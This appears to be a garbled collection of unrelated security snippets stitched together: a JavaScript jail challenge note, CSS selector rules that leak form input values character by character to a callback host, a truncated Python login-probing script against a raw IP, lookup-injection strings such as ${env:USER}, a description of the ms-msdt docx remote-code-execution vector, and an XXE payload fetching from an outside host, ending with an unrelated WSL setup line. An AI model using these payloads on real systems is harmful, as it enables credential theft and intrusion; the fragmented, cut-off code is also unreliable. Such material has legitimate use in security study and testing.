Simple JS Jail challenge.
It is run in a context, so we have nothing to play with but constructor and console.
1337 === eval(our_input)
input[name$=code_1][value^=a]{background-image: url(https://callback.yourdomain.com/callback?token=a&id=CODE_1);}
input[name$=code_1][value^=b]{background-image: url(https://callback.yourdomain.com/callback?token=b&id=CODE_1);}
input[name$=code_1][value^=c]{background-image: url(https://callback.yourdomain.com/callback?token=c&id=CODE_1);}
input[name$=code_1][value^=d]{background-image: url(https://callback.yourdomain.com/callback?token=d&id=CODE_1);}
input[name$=code_1][value^=e]{background-image: url(https://callback.yourdomain.com/callback?token=e&id=CODE_1);}
input[name$=code_1][value^=f]{background-image: url(https://callback.yourdomain.com/callback?token=f&id=CODE_1);}
input[name$=code_1][value^=g]{background-image: url(https://callback.yourdomain.com/callback?token=g&id=CODE_1);}
input[name$=code_1][value^=h]{background-image: url(https://callback.yourdomain.com/callback?token=h&id=CODE_1);}
input[name$=code_1][value^=i]{background-image: url(https://callback.yourdomain.com/callback?token=i&id=CODE_1);
import requests
import re
url = "http://88.198.233.174:33534/index.php"
payload = {
    "username": "",
    "password": "x",
}
def check(data):
import xml.etree.ElementTree as ET
import urllib
import base64
import math
import sys
import re
# usage: Open Burp, navigate to proxy history, ctrl-a to select all records, right click and "Save Items" as an .xml file.
# python burplist.py burprequests.xml
# output is saved to wordlist.txt
${ctx:loginId}
${map:type}
$(unknown)
${date:MM-dd-yyyy}
${docker:containerId}
${docker:containerName}
${docker:imageName}
${env:USER}
${event:Marker}
${mdc:UserId}
MS Office docx files may contain external OLE Object references as HTML files. There is an HTML scheme "ms-msdt:" which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in parameters).
The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).
Here are the steps to build a Proof-of-Concept docx:
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
References:
Windows Subsystem 2 for Linux, Hyper, ZSH + Oh My Zsh + Powerlevel9k + plugins, FNM + VSCode (+ext) and Nerd Font
To set up native Linux, see this gist